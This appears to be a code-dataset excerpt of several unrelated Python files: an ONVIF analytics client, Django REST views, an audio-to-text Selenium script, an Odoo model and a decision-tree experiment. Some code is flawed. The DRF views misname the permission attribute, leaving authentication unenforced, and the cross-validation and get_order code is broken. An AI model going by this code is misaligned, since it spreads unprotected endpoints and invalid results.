lib.requests_messages.analytics_request_messages import AnalyticsRequestMessages\n\nDEBUG = True\nLOG = False\n\nlogger = logging.getLogger('analytics_service')\nlogger.setLevel(logging.DEBUG)\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\nANALYTIC_SERVICE_NS = \"http://www.onvif.org/ver20/analytics/wsdl\"\n\nif DEBUG:\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\nif LOG: \n log = logging.FileHandler(filename=\"log/onvif_service.log\", mode='a', encoding=None, delay=False, errors=None)\n log.setLevel(logging.DEBUG)\n log.setFormatter(formatter)\n logger.addHandler(log)\n\ndef get_analytics_namespace(services = [],xaddr=\"\"):\n if services and services != None:\n for serv in services:\n ns = str(serv.Namespace)\n if serv.XAddr == xaddr and \"analytics\" in ns:\n return serv.Namespace\n else:\n return None\n \nclass AnalyticsService:\n def __init__(self,onvif_service = OnvifService()) -> None:\n self.is_analytics_service_supported = False\n self.onvif_service = onvif_service\n self.wsdlUrl = self.onvif_service.wsdl_directory + \"/analytics.wsdl\"\n self.xAddr = \"\" \n self.analytics_name_space = \"\"\n self.capabilities = {}\n self.set_analytics_service_variables()\n\n def set_analytics_service_variables(self) -> None:\n if self.onvif_service.get_con_status() and self.onvif_service.capabilities.Analytics != None:\n self.is_analytics_service_supported = True\n self.xAddr = self.onvif_service.capabilities.Analytics.XAddr\n self.analytics_name_space = get_analytics_namespace(services = self.onvif_service.services,xaddr = self.xAddr)\n self.capabilities = self.GetServiceCapabilities()\n else:\n logger.error(f\"Analytics service not sported from {self.onvif_service.ip}\")\n # AnalyticsEngineBinding\n def GetServiceCapabilities(self) -> dict:\n \"\"\"\n Returns the capabilities of the analytics service. The result is returned in a typed answer.\n - return [dict];\n - Capabilities [Capabilities]\n The capabilities for the analytics service is returned in the Capabilities element.\n \"\"\"\n service_cap = {}\n if self.onvif_service.get_con_status():\n if self.is_analytics_service_supported:\n logger.info(f\"Try to GetServiceCapabilities information..\")\n try:\n zeepAnalyticsClient = get_caching_client(isAuth=True,wsdl_URL=self.wsdlUrl,username_token=self.onvif_service.get_username_token())\n ws_client_analytics = zeepAnalyticsClient.create_service(\"{\" + self.analytics_name_space + \"}AnalyticsEngineBinding\", self.xAddr)\n service_cap = ws_client_analytics.GetServiceCapabilities()\n except Exception as emsg:\n logger.error(f\"GetServiceCapabilities unsuccess.. -> {emsg}\")\n else:\n logger.info(f\"GetServiceCapabilities complete with success..\")\n else: logger.error(f\"Analytics Service not supported..\")\n else: logger.warning(f\"No Onvif Connection!\")\n return service_cap\n # AnalyticsEngineBinding\n def GetSupportedAnalyticsModules(self,configuration_token : str) -> list:\n \"\"\"\n List all analytics modules that are supported by the given VideoAnalyticsConfiguration.\n - requirements ;\n - configuration_token [str]\n Reference to an existing VideoAnalyticsConfiguration. \n - NOT: This parameters can be found with GetCompatibleVideoAnalyticsConfigurations method by Media Service\n - return [list];\n - SupportedAnalyticsModules [SupportedAnalyticsModules]\n \"\"\"\n supported_analytics_modules = []\n if self.onvif_service.get_con_status():\n if self.is_analytics_service_supported:\n logger.info(f\"Try to GetSupportedAnalyticsModules information..\")\n try:\n zeepAnalyticsClient = get_caching_client(isAuth=True,wsdl_URL=self.wsdlUrl,username_token=self.onvif_service.get_username_token())\n ws_client_analytics = zeepAnalyticsClient.create_service(\"{\" + self.analytics_name_space + \"}AnalyticsEngineBinding\", self.xAddr)\n supported_analytics_modules = ws_client_analytics.GetSupportedAnalyticsModules(ConfigurationToken = configuration_token)\n except Exception as emsg:\n logger.error(f\"GetSupportedAnalyticsModules unsuccess.. -> {emsg}\")\n else:\n logger.info(f\"GetSupportedAnalyticsModules complete with success..\")\n else: logger.error(f\"Analytics Service not supported..\")\n else: logger.warning(f\"No Onvif Connection!\")\n return supported_analytics_modules\n # AnalyticsEngineBinding\n def CreateAnalyticsModules(self,request_message : AnalyticsRequestMessages.CreateAnalyticsModulesMessage) -> dict: # Not Tested\n \"\"\"\n Add one or more analytics modules to an existing VideoAnalyticsConfiguration. \n The available supported types can be retrieved via GetSupportedAnalyticsModules, where the Name of the supported AnalyticsModules correspond to the type of an AnalyticsModule instance.\n Pass unique module names which can be later used as reference. The Parameters of the analytics module must match those of the corresponding AnalyticsModuleDescription.\n - requirements;\n - request_message : [CreateAnalyticsModulesMessage]\n An Object for CreateAnalyticsModules request message \n - return [boolean];\n - status : True means OK else False \n \"\"\"\n status = False\n if self.onvif_service.get_con_status():\n logger.info(f\"Try to CreateAnalyticsModules request..\")\n if self.is_analytics_service_supported:\n try:\n zeepAnalyticsClient = get_caching_client(isAuth=True,wsdl_URL=self.wsdlUrl,username_token=self.onvif_service.get_username_token())\n ws_client_analytics = zeepAnalyticsClient.create_service(\"{\" + self.analytics_name_space + \"}AnalyticsEngineBinding\", self.xAddr)\n ws_client_analytics.CreateAnalyticsModules(**request_message.to_dict())\n except Exception as emsg:\n logger.error(f\"CreateAnalyticsModules unsuccess.. -> {emsg}\")\n else:\n status = True\n logger.info(f\"CreateAnalyticsModules complete with success..\")\n else:\n logger.error(f\"Analytics Service not supported..\")\n else: logger.warning(f\"No Onvif Connection!\")\n return status\n # AnalyticsEngineBinding\n def DeleteAnalyticsModules(self,configuration_token : str,analytics_module_name : str) -> bool: # Not Tested\n \"\"\"\n Remove one or more analytics modules from a VideoAnalyticsConfiguration referenced by their names.\n - requirements : \n - configuration_token : [str] \n Reference to an existing Video Analytics configuration.\n - analytics_module_name : [str] \n Name of the AnalyticsModule to be deleted.\n - return [boolean]; \n - Delete Analytics Modules status\n \"\"\"\n delete_status = False\n if self.onvif_service.get_con_status():\n if self.is_analytics_service_supported:\n logger.info(f\"Try to DeleteAnalyticsModules {analytics_module_name}..\")\n try:\n zeepAnalyticsClient = get_caching_client(isAuth=True,wsdl_URL=self.wsdlUrl,username_token=self.onvif_service.get_username_token())\n ws_client_analytics = zeepAnalyticsClient.create_service(\"{\" + self.analytics_name_space + \"}AnalyticsEngineBinding\", self.xAddr)\n ws_client_analytics.DeleteAnalyticsModules(ConfigurationToken = configuration_token,AnalyticsModuleName = analytics_module_name)\n except Exception as emsg:\n logger.error(f\"DeleteAnalyticsModules unsuccess.. -> {emsg}\")\n else:\n logger.info(f\"DeleteAnalyticsModules complete with success..\")\n delete_status = True\n else: logger.warning(f\"Analytics is not supported !\")\n else: logger.warning(f\"No Onvif Connection!\")\n return delete_status\n # AnalyticsEngineBinding\n def GetAnalyticsModuleOptions(self,configuration_token : str,analytics_type = None) -> bool: # Not Tested\n \"\"\"\n Return the options for the supported analytics modules that specify an Option attribute.\n - requirements : \n - configuration_token : [str] \n Reference to an existing AnalyticsConfiguration.\n - analytics_type - optional; [QName]\n Reference to an SupportedAnalyticsModule Type returned from GetSupportedAnalyticsModules.\n - return [dict];\n - Options - optional, unbounded; [ConfigOptions]\n List of options for the specified analytics module. The response Options shall not contain any RuleType attribute.\n \"\"\"\n options = {}\n if self.onvif_service.get_con_status():\n if self.is_analytics_service_supported:\n logger.info(f\"Try to GetAnalyticsModuleOptions information..\")\n try:\n zeepAnalyticsClient = get_caching_client(isAuth=True,wsdl_URL=self.wsdlUrl,username_token=self.onvif_service.get_username_token())\n ws_client_analytics = zeepAnalyticsClient.create_service(\"{\" + self.analytics_name_space + \"}AnalyticsEngineBinding\", self.xAddr)\n if analytics_type != None:\n options = ws_client_analytics.GetAnalyticsModuleOptions(ConfigurationToken = configuration_token,Type = analytics_type)\n else:\n options = ws_client_analytics.GetAnalyticsModuleOptions(ConfigurationToken = configuration_token)\n except Exception as emsg:\n logger.error(f\"GetAnalyticsModuleOptions unsuccess.. -> {emsg}\")\n else:\n logger.info(f\"GetAnalyticsModuleOptions complete with success..\")\n else: logger.error(f\"Analytics Service not supported..\")\n else: logger.warning(f\"No Onvif Connection!\")\n return options\n # AnalyticsEngineBinding\n def GetAnalyticsModules(self,configuration_token : str) -> list: # Not Tested\n \"\"\"\n List the currently assigned set of analytics modules of a VideoAnalyticsConfiguration.\n - requirements : \n - configuration_token : [str] \n Reference to an existing AnalyticsConfiguration.\n - return [list];\n - AnalyticsModule - optional, unbounded; [Config]\n List of analytics modules \n \"\"\"\n analytics_modules = []\n if self.onvif_service.get_con_status():\n if self.is_analytics_service_supported:\n logger.info(f\"Try to GetAnalyticsModules information..\")\n try:\n zeepAnalyticsClient = get_caching_client(isAuth=True,wsdl_URL=self.wsdlUrl,username_token=self.onvif_service.get_username_token())\n ws_client_analytics = zeepAnalyticsClient.create_service(\"{\" + self.analytics_name_space + \"}AnalyticsEngineBinding\", self.xAddr)\n analytics_modules = ws_client_analytics.GetAnalyticsModules(ConfigurationToken = configuration_token)\n except Exception as emsg:\n logger.error(f\"GetAnalyticsModules unsuccess.. -> {emsg}\")\n else:\n logger.info(f\"GetAnalyticsModules complete with success..\")\n else: logger.error(f\"Analytics Service not supported..\")\n else: logger.warning(f\"No Onvif Connection!\")\n return analytics_modules\n # AnalyticsEngineBinding\n def GetSupportedMetadata(self,type_name = None) -> dict: # Not Tested\n \"\"\"\n This method provides a computer readable description of the metadata that the selected analytics modules can generate. \n The type parameter allows to select a single analytics module. \n By default the output shall relate to all analytics modules that exist in the device.\n - requirements : \n - type_name - optional; [QName]\n Optional reference to an AnalyticsModule Type returned from GetSupportedAnalyticsModules.\n - return [dict];\n - AnalyticsModule - optional, unbounded; [MetadataInfo]\n \"\"\"\n supported_metadata = {}\n if self.onvif_service.get_con_status():\n if self.is_analytics_service_supported:\n logger.info(f\"Try to GetSupportedMetadata information..\")\n try:\n zeepAnalyticsClient = get_caching_client(isAuth=True,wsdl_URL=self.wsdlUrl,username_token=self.onvif_service.get_username_token())\n ws_client_analytics = zeepAnalyticsClient.create_service(\"{\" + self.analytics_name_space + \"}AnalyticsEngineBinding\", self.xAddr)\n if type_name != None:\n supported_metadata = ws_client_analytics.GetSupportedMetadata(Type = type_name)\n else:\n supported_metadata = ws_client_analytics.GetSupportedMetadata()\n except Exception as emsg:\n logger.error(f\"GetSupportedMetadata unsuccess.. -> {emsg}\")\n else:\n logger.info(f\"GetSupportedMetadata complete with success..\")\n else: logger.error(f\"Analytics Service not supported..\")\n else: logger.warning(f\"No Onvif Connection!\")\n return supported_metadata\n # AnalyticsEngineBinding\n def ModifyAnalyticsModules(self,request_message : AnalyticsRequestMessages.ModifyAnalyticsModulesMessage) -> bool: # Not Tested\n \"\"\"\n Modify the settings of one or more analytics modules of a VideoAnalyticsConfiguration. \n The modules are referenced by their names. It is allowed to pass only a subset to be modified.\n - requirements;\n - request_message : [ModifyAnalyticsModulesMessage]\n An Object for ModifyAnalyticsModules request message \n - return [boolean];\n - status : True means OK else False \n \"\"\"\n status = False\n if self.onvif_service.get_con_status():\n logger.info(f\"Try to ModifyAnalyticsModules request..\")\n if self.is_analytics_service_supported:\n try:\n zeepAnalyticsClient = get_caching_client(isAuth=True,wsdl_URL=self.wsdlUrl,username_token=self.onvif_service.get_username_token())\n ws_client_analytics = zeepAnalyticsClient.create_service(\"{\" + self.analytics_name_space + \"}AnalyticsEngineBinding\", self.xAddr)\n ws_client_analytics.ModifyAnalyticsModules(**request_message.to_dict())\n except Exception as emsg:\n logger.error(f\"ModifyAnalyticsModules unsuccess.. -> {emsg}\")\n else:\n status = True\n logger.info(f\"ModifyAnalyticsModules complete with success..\")\n else: logger.error(f\"Analytics Service not supported..\")\n else: logger.warning(f\"No Onvif Connection!\")\n return status\n # RuleEngineBinding\n def CreateRules(self,request_message : AnalyticsRequestMessages.CreateRulesMessage) -> bool:\n \"\"\"\n Add one or more analytics modules to an existing VideoAnalyticsConfiguration. \n The available supported types can be retrieved via GetSupportedAnalyticsModules, \\\n where the Name of the supported AnalyticsModules correspond to the type of an AnalyticsModule instance.\n - requirements;\n - request_message : [CreateRulesMessage]\n An Object for CreateRules request message \n - return [boolean];\n - status : True means OK else False \n \"\"\"\n status = False\n if self.onvif_service.get_con_status():\n logger.info(f\"Try to CreateRules request..\")\n if self.is_analytics_service_supported:\n try:\n zeepAnalyticsClient = get_caching_client(isAuth=True,wsdl_URL=self.wsdlUrl,username_token=self.onvif_service.get_username_token())\n ws_client_analytics = zeepAnalyticsClient.create_service(\"{\" + self.analytics_name_space + \"}RuleEngineBinding\", self.xAddr)\n ws_client_analytics.CreateRules(**request_message.to_dict())\n except Exception as emsg:\n logger.error(f\"CreateRules unsuccess.. -> {emsg}\")\n else:\n status = True\n logger.info(f\"CreateRules complete with success..\")\n else: logger.error(f\"Analytics Service not supported..\")\n else: logger.warning(f\"No Onvif Connection!\")\n return status\n # RuleEngineBinding\n def DeleteRules(self,configuration_token : str,rule_name : str) -> bool:\n \"\"\"\n Remove one or more rules from a VideoAnalyticsConfiguration.\n - requirements : \n - configuration_token : [str] \n Reference to an existing Video Analytics configuration.\n - rule_name : [str] \n References the specific rule to be deleted (e.g. \"MyLineDetector\").\n - return [boolean]; \n - Delete Rules status\n \"\"\"\n delete_status = False\n if self.onvif_service.get_con_status():\n if self.is_analytics_service_supported:\n logger.info(f\"Try to DeleteRules {rule_name}..\")\n try:\n zeepAnalyticsClient = get_caching_client(isAuth=True,wsdl_URL=self.wsdlUrl,username_token=self.onvif_service.get_username_token())\n ws_client_analytics = zeepAnalyticsClient.create_service(\"{\" + self.analytics_name_space + \"}RuleEngineBinding\", self.xAddr)\n ws_client_analytics.DeleteRules(ConfigurationToken = configuration_token,RuleName = rule_name)\n except Exception as emsg:\n logger.error(f\"DeleteRules unsuccess.. -> {emsg}\")\n else:\n logger.info(f\"DeleteRules complete with success..\")\n delete_status = True\n else: logger.error(f\"Analytics Service not supported..\")\n else: logger.warning(f\"No Onvif Connection!\")\n return delete_status\n # RuleEngineBinding\n def GetRuleOptions(self,configuration_token : str,rule_type = None) -> dict:\n \"\"\"\n Return the options for the supported rules that specify an Option attribute.\n - requirements : \n - configuration_token : [str] \n Reference to an existing analytics configuration.\n - rule_type - optional; [QName]\n Reference to an SupportedRule Type returned from GetSupportedRules.\n - return [dict];\n - RuleOptions - optional, unbounded; [ConfigOptions]\n A device shall provide respective ConfigOptions.\n RuleType for each RuleOption if the request does not specify RuleType. \n The response Options shall not contain any AnalyticsModule attribute.\n \"\"\"\n rule_options = {}\n if self.onvif_service.get_con_status():\n if self.is_analytics_service_supported:\n logger.info(f\"Try to GetRuleOptions information..\")\n try:\n zeepAnalyticsClient = get_caching_client(isAuth=True,wsdl_URL=self.wsdlUrl,username_token=self.onvif_service.get_username_token())\n ws_client_analytics = zeepAnalyticsClient.create_service(\"{\" + self.analytics_name_space + \"}RuleEngineBinding\", self.xAddr)\n if rule_type != None: \n rule_options = ws_client_analytics.GetRuleOptions(ConfigurationToken = configuration_token,RuleType = rule_type)\n else: \n rule_options = ws_client_analytics.GetRuleOptions(ConfigurationToken = configuration_token)\n except Exception as emsg:\n logger.error(f\"GetRuleOptions unsuccess.. -> {emsg}\")\n else: logger.info(f\"GetRuleOptions complete with success..\")\n else: logger.error(f\"Analytics Service not supported..\")\n else: logger.warning(f\"No Onvif Connection!\")\n return rule_options\n # RuleEngineBinding\n def GetRules(self,configuration_token : str) -> list:\n \"\"\"\n List the currently assigned set of rules of a VideoAnalyticsConfiguration.\n - requirements : \n - configuration_token : [str] \n Reference to an existing VideoAnalyticsConfiguration.\n - return [list];\n - Rule - optional, unbounded; [Config]\n List of Rules \n \"\"\"\n rules = []\n if self.onvif_service.get_con_status():\n if self.is_analytics_service_supported:\n logger.info(f\"Try to GetRules information..\")\n try:\n zeepAnalyticsClient = get_caching_client(isAuth=True,wsdl_URL=self.wsdlUrl,username_token=self.onvif_service.get_username_token())\n ws_client_analytics = zeepAnalyticsClient.create_service(\"{\" + self.analytics_name_space + \"}RuleEngineBinding\", self.xAddr)\n rules = ws_client_analytics.GetRules(ConfigurationToken = configuration_token)\n except Exception as emsg:\n logger.error(f\"GetRules unsuccess.. -> {emsg}\")\n else:\n logger.info(f\"GetRules complete with success..\")\n else: logger.error(f\"Analytics Service not supported..\")\n else: logger.warning(f\"No Onvif Connection!\")\n return rules\n # RuleEngineBinding\n def GetSupportedRules(self,configuration_token : str) -> list:\n \"\"\"\n List all rules that are supported by the given VideoAnalyticsConfiguration.\n - requirements : \n - configuration_token : [str] \n References an existing Video Analytics configuration. \n The list of available tokens can be obtained via the Media service GetVideoAnalyticsConfigurations method.\n - return [list];\n - SupportedRules [SupportedRules]\n \"\"\"\n supported_rules = []\n if self.onvif_service.get_con_status():\n if self.is_analytics_service_supported:\n logger.info(f\"Try to GetSupportedRules information..\")\n try:\n zeepAnalyticsClient = get_caching_client(isAuth=True,wsdl_URL=self.wsdlUrl,username_token=self.onvif_service.get_username_token())\n ws_client_analytics = zeepAnalyticsClient.create_service(\"{\" + self.analytics_name_space + \"}RuleEngineBinding\", self.xAddr)\n supported_rules = ws_client_analytics.GetSupportedRules(ConfigurationToken = configuration_token)\n except Exception as emsg:\n logger.error(f\"GetSupportedRules unsuccess.. -> {emsg}\")\n else:\n logger.info(f\"GetSupportedRules complete with success..\")\n else: logger.error(f\"Analytics Service not supported..\")\n else: logger.warning(f\"No Onvif Connection!\")\n return supported_rules\n # RuleEngineBinding\n def ModifyRules(self,request_message : AnalyticsRequestMessages.ModifyRulesMessage) -> bool:\n \"\"\"\n Modify one or more rules of a VideoAnalyticsConfiguration. The rules are referenced by their names.\n - requirements;\n - request_message : [ModifyRulesMessage]\n An Object for ModifyRules request message \n - return [boolean];\n - status : True means OK else False \n \"\"\"\n status = False\n if self.onvif_service.get_con_status():\n logger.info(f\"Try to ModifyRules request..\")\n if self.is_analytics_service_supported:\n try:\n zeepAnalyticsClient = get_caching_client(isAuth=True,wsdl_URL=self.wsdlUrl,username_token=self.onvif_service.get_username_token())\n ws_client_analytics = zeepAnalyticsClient.create_service(\"{\" + self.analytics_name_space + \"}RuleEngineBinding\", self.xAddr)\n ws_client_analytics.ModifyRules(**request_message.to_dict())\n except Exception as emsg:\n logger.error(f\"ModifyRules unsuccess.. -> {emsg}\")\n else:\n status = True\n logger.info(f\"ModifyRules complete with success..\")\n else: logger.error(f\"Analytics Service not supported..\")\n else: logger.warning(f\"No Onvif Connection!\")\n return status","repo_name":"enstns/onvif-python","sub_path":"lib/services/analytics_service.py","file_name":"analytics_service.py","file_ext":"py","file_size_in_byte":25277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"23457095216","text":"from rest_framework import status\nfrom django.db.models import Q\nfrom rest_framework.permissions import IsAuthenticated\nfrom .serializer import ThunesUserAccountSerializer, ThunesUserTransactionSerializer, ThunesUserAccountTopupSerializer\nfrom rest_framework.generics import CreateAPIView, ListCreateAPIView, ListAPIView\nfrom .models import UserAccount, Transaction\nfrom rest_framework.response import Response\nfrom apps.accounts.utils.pagination import PaginationWithDefaults\n# Create your views here.\n\n\nclass ThunesUserAccountAPI(CreateAPIView):\n permission_required = (IsAuthenticated,)\n serializer_class = ThunesUserAccountSerializer\n\n def get(self, request):\n user_id = request.user.id\n user_account = UserAccount.objects.filter(user_id=user_id).first()\n serializer = ThunesUserAccountSerializer(user_account)\n return Response(serializer.data)\n\n\nclass ThunesUserAccountTopupAPI(CreateAPIView):\n permission_required = (IsAuthenticated,)\n serializer_class = ThunesUserAccountTopupSerializer\n\n\n\nclass ThunesTransactionAPI(ListCreateAPIView):\n permission_required = [IsAuthenticated]\n serializer_class = ThunesUserTransactionSerializer\n pagination_class = PaginationWithDefaults\n\n def get_queryset(self):\n # get all transaction\n transactions = Transaction.objects.filter(Q(sender_id=self.request.user.id) | Q(\n receiver_id=self.request.user.id))\n return transactions","repo_name":"AzizieAbuduaini/bank-account-api","sub_path":"apps/accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"29376655417","text":"import os\nimport shutil\nfrom pydub import AudioSegment\nfrom pydub.utils import make_chunks\nfrom selenium import webdriver\nimport time\nimport re\n\ndir_parent = 'D:\\\\测试音频'\t\t#音频存放位置\ndir_letter = dir_parent + '\\\\合并后的音频'\t#合并后的音频存放的位置\ndir_letter_letter = dir_parent + '\\\\切割后的音频'\t#切割后的音频存放的位置\ndir_letter_txt = dir_parent + '\\\\转换后的txt文件'\t#下载转换后的txt文件存放的位置\nadd_sound = AudioSegment.from_wav('sample.wav')\t\t#sample.wav是间隔音频,和脚本放在同一目录\nsum_sound = add_sound\n\n# 分别和并同一文件夹下的所有音频\nfor path,dir_list,file_list in os.walk(dir_parent):\n for dir_name in dir_list:\n dir_child = dir_parent + '\\\\' + dir_name\n for path,dir_list,file_list in os.walk(dir_child):\n for file_name in file_list:\n #print(file_name)\n front_path = os.path.join(path, file_name)\n #print(front_path)\n front_sound = AudioSegment.from_wav(front_path)\n sum_sound = sum_sound + front_sound + add_sound\n sum_sound.export(dir_child+'已合并.wav',format=\"wav\")\n sum_sound = add_sound\n print(dir_child+'文件下的音频合并完成')\n \n# 将处理过的音频放入同一文件夹内\nos.makedirs(dir_letter)\nfor file in os.listdir(dir_parent):\n if os.path.isfile(dir_parent + '\\\\' + file):\n if '已合并' in file:\n shutil.move(dir_parent + '\\\\' + file,dir_letter) \nprint(\"所有音频合并完成\")\n\n\n# 切割合并后的音频\nchunk_length_ms = 325000 # 分块的毫秒数(测试wav文件每个音频如果在325s内刚好不多于20M,当然也可以改成300s)\nos.makedirs(dir_letter_letter) # 创建切割音频的文件夹\nfor path,dir_list,file_list in os.walk(dir_letter):\n for file_name in file_list:\n audio = AudioSegment.from_file(dir_letter+'\\\\'+file_name , \"wav\") \n chunks = make_chunks(audio, chunk_length_ms) #将音频切割\n #保存切割的音频到文件\n # 下面两行目的是对文件名进行简单处理,保证文件名都是数字,排序时方便整理,这个因文件名而异\n file_name_change1 = file_name.strip('已合并.wav')\n file_name_change2 = file_name_change1.strip('AAAAA')\t#AAAAA是file_name的前缀\n for i, chunk in enumerate(chunks):\n chunk_name = dir_letter_letter+\"\\\\\"+file_name_change2+\"{0}.wav\".format(i)\n chunk.export(chunk_name, format=\"wav\")\n print (\"音频\"+file_name_change2+\"切割完成\")\nprint(\"所有音频切割完成\")\n\n# 转换音频文件\n# 更改firefox默认下载设置,不懂可自行Google\nprofile = webdriver.FirefoxProfile()\nprofile.set_preference('browser.download.dir',dir_letter_letter)\nprofile.set_preference('browser.download.folderList',2)\nprofile.set_preference('browser.download.manager.showWhenStarting',False)\nprofile.set_preference('browser.helperApps.neverAsk.saveToDisk','text/plain')\n\n# 历遍文件夹内的文件并返回一个列表\npath_list = os.listdir(dir_letter_letter)\n# 利用循环历遍path_list列表\nfor file_name in path_list:\n #print(filename)\n #启动浏览器\n driver1 = webdriver.Firefox(firefox_profile=profile)\n driver1.get(\"https://app.xunjiepdf.com/voice2text/\")\t#打开迅捷转换网页\n print('开始上传'+file_name+'音频文件')\n upload = driver1.find_element_by_name('file')\t#寻找上传按钮\n upload.send_keys(dir_letter_letter+'\\\\'+file_name) #上传文件\n print('音频文件'+file_name+'上传成功')\n time.sleep(5)\n driver1.execute_script(\"arguments[0].click();\", driver1.find_element_by_xpath(\"//span[contains(text(),'开始转换')]\"))\n time.sleep(35)\n print('开始下载文件')\n driver1.execute_script(\"arguments[0].click();\", driver1.find_element_by_xpath(\"//a[contains(text(),'立即下载')]\"))#定位txt下载按钮并下载\n print('文件下载成功')\nprint('所有文件下载完成')\n","repo_name":"Leeyuxun/Audio-to-Text","sub_path":"脚本1.py","file_name":"脚本1.py","file_ext":"py","file_size_in_byte":4039,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"35515474674","text":"class Node:\n def __init__(self, v):\n self.val = v\n self.next = None\n\ndef reverse(head: Node) -> Node:\n if head.next == None:\n return head\n next = head.next\n newHead = reverse(next)\n next.next = head\n head.next = None\n return newHead\n\nnode = Node(1)\nnode.next = Node(2)\nnode.next.next = Node(3)\nnode.next.next.next = Node(4)\n\nnode = reverse(node)\ndef output(node):\n while node != None:\n print(node.val)\n node = node.next\noutput(node)","repo_name":"zhuzhu18/leetcode","sub_path":"206反转链表.py","file_name":"206反转链表.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"8671894808","text":"from openerp.osv import osv, fields\n\n\nclass PurchaseRequisition(osv.Model):\n\n _inherit = 'purchase.requisition'\n _columns = {\n 'purchaser_id': fields.many2one(\n 'res.users',\n 'P&C Analyst',\n domain=[('is_purchaser', '=', True)],\n help=('Contract Analyst responsible to evaluate the current'\n ' purchase requisition.')),\n }\n\n def copy(self, cr, uid, id, default=None, context=None):\n default = default or {}\n default.update({'purchaser_id': False})\n return super(PurchaseRequisition, self).copy(cr, uid, id, default,\n context=context)\n\n\nclass ResPartner(osv.Model):\n\n _inherit = 'res.partner'\n _columns = {\n 'is_purchaser': fields.boolean(\n 'P&C Analyst',\n help='Is this a Purchaser?'),\n }\n\n def copy(self, cr, uid, id, default=None, context=None):\n default = default or {}\n default.update({'is_purchaser': False})\n return super(ResPartner, self).copy(cr, uid, id, default,\n context=context)\n","repo_name":"OpenBusinessSolutions/odoo-karina","sub_path":"addons-vauxoo/purchase_requisition_contract_analyst/model/purchase_requisition.py","file_name":"purchase_requisition.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"14353182805","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tree.base import DecisionTree\nfrom metrics import *\n\nnp.random.seed(42)\n\nfrom sklearn.datasets import make_classification\nX, y = make_classification(\nn_features=2, n_redundant=0, n_informative=2, random_state=1, n_clusters_per_class=2, class_sep=0.5)\n\n# For plotting\nplt.scatter(X[:, 0], X[:, 1], c=y)\nplt.show()\n# print(X)\nX=pd.DataFrame(X)\n#print(X.head())\ny=pd.Series(y)\nfor criteria in ['information_gain', 'gini_index']:\n tree = DecisionTree(criterion=criteria) #Split based on Inf. Gain\n tree.fit(X.iloc[:70,:], y.iloc[:70:])\n y_hat = tree.predict(X.iloc[71:,:])\n print(\"accuracy: \",accuracy(y_hat,y.iloc[71::]))\n print('Criteria :', criteria)\n for i in y.unique(): # gives per class precision and recall\n print(\"precision: \",precision(y_hat,y.iloc[71::],i))\n print(\"recall: \",recall(y_hat,y.iloc[71::],i))\n\nX['y']=y\n# 5-fold crossvalidation for the generated data\ndef fivefoldcv(X):\n l=X.shape[0]\n fold_acc=[]\n depths=[]\n #outer loop to divide test and train\n for i in range(5):\n fold_train=X.iloc[:round(l*(0.8)),:]\n fold_test=X.iloc[round(l*(0.8)):,:]\n ar=np.array_split(fold_train,5)\n acc_arr=[]\n #train and validation split\n for j in range(5):\n val_data=ar[0]\n val_y=val_data['y']\n val_X=val_data.drop(['y'],axis=1)\n frames=[]\n for k in range(j):\n if k!=j:\n frames.append(ar[k])\n train_data=pd.concat(ar)\n train_y = train_data['y']\n train_X = train_data.drop(['y'], axis=1)\n # print(train_X)\n # print(train_y)\n # train the model with different depths and test it on the validation set\n depth_acc = [0]\t\t\n for m in range(1, 11):\n tree = DecisionTree('inforamation_gain', m)\n tree.fit(train_X, train_y)\n y_hat = tree.predict(val_X)\n acc = accuracy(y_hat, val_y)\n depth_acc.append(acc)\n acc_arr.append(depth_acc)\n # calulate average accuracy for each depth\n l = len(acc_arr)\n avg_accs = [0]\n for t in range(1,11):\n temp = []\n for j in range(5):\n temp.append(acc_arr[j][t])\n avg = np.mean(temp)\n avg_accs.append(avg)\n for k in range(1,11):\n if(avg_accs[k]>avg_accs[k-1]):\n print(\"depth: \", k, ' --> accuracy: ', avg_accs[k])\n \n # take the best depth from validation\n best_depth = 10\n max_acc = 0\n for k in range(1,11):\n if(avg_accs[k]>max_acc):\n max_acc = avg_accs[k]\n best_depth = k\n \n #finding the fold accuracy\n testing_y=fold_train['y']\n testing_X=fold_train.drop(['y'],axis=1)\n final_y=fold_test['y']\n final_x=fold_test.drop(['y'],axis=1)\n tree = DecisionTree('inforamation_gain', best_depth)\n tree.fit(testing_X, testing_y)\n y_final = tree.predict(final_x)\n ac = accuracy(y_final, final_y)\n fold_acc.append(ac)\n depths.append(best_depth)\n\t\n # print(fold_accuracies)\n return fold_acc, depths\nprint(fivefoldcv(X))\n","repo_name":"KeyurIITGN/Decision-Trees-From-Scratch","sub_path":"assignment-1/classification-exp.py","file_name":"classification-exp.py","file_ext":"py","file_size_in_byte":3350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"33970231224","text":"from rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom reporting.models import ProductStock, SaleHistory\nfrom internal.serializers import StockSerializer, SaleHistorySerializer, OrderSerializer\nfrom internal.models import Order\n\n@api_view(['GET'])\ndef get_all (request):\n stock = ProductStock.objects.all()\n serializer = StockSerializer(stock, many = True)\n return Response(serializer.data)\n\n@api_view(['GET'])\ndef get_stock_name (request, pk):\n try:\n stock = ProductStock.objects.filter(name =pk)\n serializer = StockSerializer(stock, many = False)\n return Response({'message':'Stock for the asked product'}, status=status.HTTP_200_OK)\n \n except Exception as e:\n return Response({\"error\":str(e)},status=status.HTTP_204_NO_CONTENT)\n\n\n@api_view(['GET'])\ndef get_order(request):\n order = order.objects.all()\n serializer = OrderSerializer(order, many= True)\n return Response(serializer.data)\n\n 